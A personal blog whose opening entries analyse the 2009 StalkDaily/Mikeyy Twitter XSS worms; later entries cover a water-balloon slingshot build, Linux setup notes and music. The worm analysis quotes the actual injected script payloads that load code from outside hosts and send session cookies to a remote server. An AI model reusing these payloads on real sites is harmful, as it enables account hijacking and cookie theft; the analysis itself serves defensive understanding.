Analysis

The code firstly defines 2 functions. 1) A complex function that returns a http connection object, allowing calls to a url (GET or POST) to be made. 2) A urlencode function to transform special characters in text to allow them to be sent as part of a url.

The code then performs the following actions when visiting an infected twitter page:

• Scan the pages HTML content, and extract the logged in users screen name.
• retrieve stored cookies for the twitter domain
• inserts into the document html an image element, the url of which is at uuuq.com and contains the above username and cookies. This effectively sends the username and cookies to the remove server, which most likely records them.
• inserts into the document html an image element, showing the logo at stalkdaily.com

Defined next is a function called wait. This function is then called via the setTimeout function. the setTimeout function sleeps for the specified time (allowing the browser to continue working), and then calls the requested function. The wait function does the following:

• Scans the html for the form_authenticity_token, a token placed there by twitter as an addition security mechanism designed to ensure the that action requests made to twitter originate from the browser, and logged in user.
• ramdomly chooses from one of the following message:
  • Dude, www.StalkDaily.com is awesome. What’s the fuss?
  • Join www.StalkDaily.com everyone!
  • Woooo, www.StalkDaily.com
  • Virus!? What? www.StalkDaily.com is legit!
  • Wow…www.StalkDaily.com
  • @twitter www.StalkDaily.com
• calls /status/update to tweet one of the above messages
• calls /account/settings to update the users profile web page to:
  • http://www.stalkdaily.com”></a><script src=”http://mikeyylolz.uuuq.com/x.js”></script><a

Conclusions

The worm

• tweets a message
• changes your profile web page to stalkdaily.com, but also injecting script code, thereby making this script a self-propogating worm.
• sends your username and cookies to a remote server.

The first two are similar to my analisis of the newer worm (although this uses the user-url field, rather than the profile-color field)

The third action is the dirsturbing one, though so far as I can tell, it was removed from the newer worm.

What this means, for those who viewed the profile of a user infected with the original worm:

• The remote site captures your username (no big deal)
• The remote site has your username and the session cookies you are connecting with

On a properly designed site, session cookies should only apply to a specific IP address. that is, if the remote hacker tries to re-use the username and cookies from a computer they control, twitter should reject the session, and require the user to login.

Twitter does not do this, which means acquiring the session cookie allows the remote hacker to impersonate your session. Presumabely twitter does not implement this security feature as a convenience, allowing twitter users to remain logged in while roaming to different internet connections.

Thankfully though, the session cookie is dropped from the server when you log out. Therefore logging out and back in will disallow the remote hacker from accessing your profile if:

• you log out of all sessions where you viewed an infected profile
• the remote hacker has not changed your password

As said in my previous article, users can and should protect themselves by only running javascript from sources they trust. The NoScript extension is an easy and relatively convenient way to do this.

Twitter 1) should review their code, ensuring all fields that accept information from the outside world properly escape all information sent, removing the possibility of XSS attacks, and 2) lock session cookies to a single IP address. The first I’m sure they have already done. The second I’m sure they will not, and probably will never *sigh*

The following is a quickly developed, haphazard analysis of the StalkDaily worm that infected accounts of twitter users on 12Apr 2009. Apologies for the roughness. It was done to satisfy my own curiosity. If you spot something clearly wrong, let me know. If anyone would like any further information, please contact me.

Observation

By observation, this worm does the following:

• Causes you to tweet something like:
  • Wow…Mikeyy.
  • Mikeyy. Woooo!
  • Dude, Mikeyy is the shit! :)
  • damn mikeyy. haha.
  • Man, Twitter can’t fix shit. Mikeyy owns. :)
  • Twitter should really fix this… Mikeyy
• Causes you to follow profile 28546293, or onedegrees
• Updates your profile name to “Mikey Owns”
• inserts a link to the worm code into your profiles color field
  

Unpacking

By comparing the accounts of infected and uninfected users we see the following code:

a { color: #</style>mikeyy:) “></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6f%6d%67%68%61%78%2e%75%75%75%71%2e%63%6f%6d%2f%77%6f%6f%2e%70%68%70%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <style> <a ; }

This appears in the place where we would expect to see a css color element as follows:

a { color: #0000ff; }

This appears to be an injection into the twitter database, replacing the colour code of the page with JavaScript code. The JavaScript code instructs the browser to load the JavaScript code located at http://omghax.uuuq.com/woo.php. By watching proxy logs of a machine browsing infected pages, we see the following pages being accessed:

http://omghax.uuuq.com/woo
 http://omghax.uuuq.com/bam

This is explained by examining one of these scripts. Within the script is found the following strings:

• Msxml2.XMLHTTP
• Microsoft.XMLHTTP
• connect
• oUpperCase
• GET
• ?
• open
• Method
• POST
• HTTP/1.1
• setRequestHeader
• Content-Type
• application/x-www-form-urlencoded
• onreadystatechange
• readyState
• send
• split
• join
• ‘
• %27
• (
• %28
• )
• %29
• *
• %2A
• ~
• %7E
• !
• %21
• %20
• +
• %
• replace
• innerHTML
• documentElement
• exec
• Dude, Mikeyy is the shit!
• Man, Twitter can’t fix shit. Mikeyy owns.
• Mikeyy. Woooo!
• Dude! Mikeyy! Seriously? Haha.
• Wow…Mikeyy.
• damn mikeyy. haha.
• random
• length
• floor
• </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/woo.php”></script>.source));</script> <style> <a
• </style>mikeyy:) “></a><script>document.write(<script src=”http://content.ireel.com/jsxss.js”></script>.source));</script> <style><a
• </style>mikeyy:) “></a><script>document.write(<script src=”http://content.ireel.com/xssjs.js”></script>.source));</script> <style><a
• </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/bam”></script>.source));</script> <style><a
• </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/woo”></script>.source));</script> <style><a
• /account/profile_settings
• POST
• authenticity_token=
• &user[profile_link_color]=
• &commit=save+changes
• /account/settings
• &user[name]=Mikeyy+Owns&user[url]=
• &tab=home&update=update
• /status/update
• &status=
• &return_rendered_status=true&twttr=true
• /friendships/create/28546293
• &twttr=true
• wait()

Analysis

Towards the bottom of this list you start to see some important elements:

• /account/profile_settings &user[profile_link_color]= &commit=save+changes
• /account/settings &user[name]=Mikeyy+Owns&user[url]=
• /status/update
• /friendships/create/28546293

While the code is obfuscated, and beyond my knowledge to easily decode, these strings provide some important clues. I would assume that the worm is calling URLs at twitter using these strings. Conceivably these would

• Update the profile colour, inserting the worm code
• Update the profile name
• creating a friendship with onedegrees

Because the code is run inside the browser, in the context of normal page views by the logged in twitter user, the code “acts on your behalf”, to perform these actions. Neither the script, or the script author know your username or password, it simply “asks” the browser to perform these actions. Because you are already logged on in the browser, the action is performed as if you did it yourself.

Conclusion

I would estimate that the root cause of this problem is an JavaScript injection vulnerability in twitters color field, which now seems to be fixed. This allowed the worm to place JavaScript code inside this field, rather than the expected colour code which would normally be sent by the browser.

While not the cause, another vulnerability that allowed this to happen is the web-browsers in-built JavaScript engine, which runs any JavaScript code it is instructed to. This to me is not desirable. In effect, every time you visit a website, you are inviting some unknown person to run whatever JavaScript code they like inside your browser. This is historically the cause of many major security and virus problems, and will be into the future.

JavaScript is a useful tool in creating interactive websites, but must considered carefully. I recommend disabling JavaScript by default and only enabling it for sites you trust. The NoScript extension makes this easy.

Being that the malicious code in the StalkDaily worm was hosted on an external site, running twitters javascript code would not have allowed this worm to execute unless you also permitted code from uuuh.com to run also.

At short notice today we decided to build a machine to launch water balloons at the neighbouring building. With the aid of Levi, we designed, acquired parts, and assembled in a few hours a lethal water balloon launching sling shot.

The weapon consisted of the following parts:

• 4 metres of bungee cord @ 1.25/mtr
• 2 sections of scrap wood @ $1 ea
• 4 180mm long 10mm dia bolts, and nuts to match @ ~ $2 ea
• left over piece of shade cloth

and of course 1200 water balloons @ $2 per 200.

We eventually got the weapon capable of firing water balloons from the upstairs balcony, over the neighbouring building, and into the car park on the other side.

The construction:

• A frame was made with the wood, cut so we could place one piece on either side of the railing on the balcony. Held together with the bolts, formed the frame and supports for our catapult.
• two holes in each of the supports to feed the elastic cord through
• A roughly 200×120mm square of shade cloth, a few layers thick, with small holes placed in the corners to run the cord through
• The cord threaded through the holes in the supports with the shade cloth pocket threaded onto the cord between the supports
• Attach the supports about 1m apart

A few lessons learned:

• Water balloons burst very easily, if the sling is too tight, and places too much force on the balloon, it will burst on launch.
• the elastic we bought was probably too heavy (it was about 10mm dia), and put too much force on the balloon.
• To counter this, we found placing the supports only 1m apart, rather than keeping it tight at 2m worked better. It accelerated the balloons more gently.
• A single piece of elastic, or much smaller gauge elastic would have worked better. Weaker elastic with a longer stretching distance would give the balloon a much gentler acceleration, hopefully allowing a more powerful, or longer throw
• I don’t recommend putting anything other than water balloons in the sling. Balloons don’t do too much damage. With this sort of power, they do hurt if they hit you, but anything more solid would be downright dangerous.

Elsbeth, Sarah, Rob, Sarah and Carey, preparing amunition.

What a way to waste an afternoon. Enjoy kids.

Also been thinking about the future of this blog. I had hoped to get more out of writing this blog than i have been, and i know, looking back over my entries, there is little useful content. I would therefore like to try a different method:
Currently, while doing the reading i try to do every day, i often find articles i know would interest certain people, and will often put them aside and email them out. Frequently i find a number of related articles and become interested in the subject, and end up writing a half page summary, interspersed with links and references.
I would like to try to approach this blog in that form, to write a weekly or fortnightly article on a particular topic. I enjoy the emails i write, and hope i will enjoy this also, despite the fact it will no longer be directed towards a known audience.

Installed beagle and got it working. Have been interested in the idea ever since i read about a concept of dashboard. To be really useful i need to set it to index all the data on my server and other HDD, rather than just my home folder.

deb ftp://sunsite.cnlab-switch.ch/mirror/debian/ unstable main contrib non-free

I manually installed thunderbird from their website, and after changing sources.list thunderbird broke. updated thunderbird from synaptic, and worked fine.

Spent hours trying to get thunderbird working in the first place. I have a thunderbird profile of about 1Gb, which i didn’t want to loose. Ended up having to manually editing prefs.js to update all the paths from my windows setup. After that, and upgrading thunderbird it seems to be working fine, except the fact i am unable to access postoffice.csu.edu.au from this IP address. Its getting rather annoying.

Been going back through the histories music-wise. Found a stack of albums at leading edge, Gene Pitney, Hank Williams, Bee Gees, Carpenters, and Beach Boys. Also found a very nice album from Sydney musician Lior. Very impressed with Gene Pitney, and was already fans of Carpenters and Bee Gees. Also got my hands on Motown Remixed, which I saw advertised in Sain magazine (for Sanity Music). Eleanor and her father are big fans of motown artists, and although i know some of the songs on the album, i don’t know them well enough to compare them to the originals. Also finally got a Jackson 5 album (only took me 2 years), and loving it.

Started implementing security into timeshare, its an uphill task, so many things to be redone/fixed to work with the new changes. Hopefully a chance to fix old bugs, but probably an opportunity to generate new ones.

Bought a cheap KVM switch box (finally), and as a result have started using my Linux box much more (I don’t have to crawl around to swap cables any more). Have moved my php editing environment across, and moved GAIM across. Not game to move my mail (thunderbird) across yet, think I’ll set up a dedicated hard drive for my home directory first.

Few interesting finds recently. PostSecret is a rather interesting project. Also Katrina has started a new comic.
Have started using GIM (Googles new Instance Messaging service). Installed the client and had a quick (30 sec) look, but have been otherwise running it under GAIM (username: trevor_peacock at you-know-where).

Next few days: gotta get over this cold, knock over the last few assignments for this term, and make arrangements for the holidays. Fun fun…

Continuing to work back through Dream Theaters discography, I’m quite impressed by their 1997 album “Falling Into Infinity”. Quite a relaxing mix of songs, plenty of different styles, every song is unique.

The text book for operating systems arrived (surprisingly), so I can now make a start on that.

Working back through Dream Theatres albums, I found a very nice piece in Train of Thoughts called Vacant. It starts with a familiar piece of music, which I haven’t yet been able to identify. I think John Williams may have played it somewhere, or it could be a classical piece from somewhere else. I don’t know my composers well enough to narrow it down any. Vacant introduces a well worked vocal melody over the original piece. The 2:57 piece is followed by the instrumental Stream of Consciousness (11:16) which presents variations on the original melody, I’ve been playing the two most of the day on repeat, and starting to work out some of the pieces on piano/flute.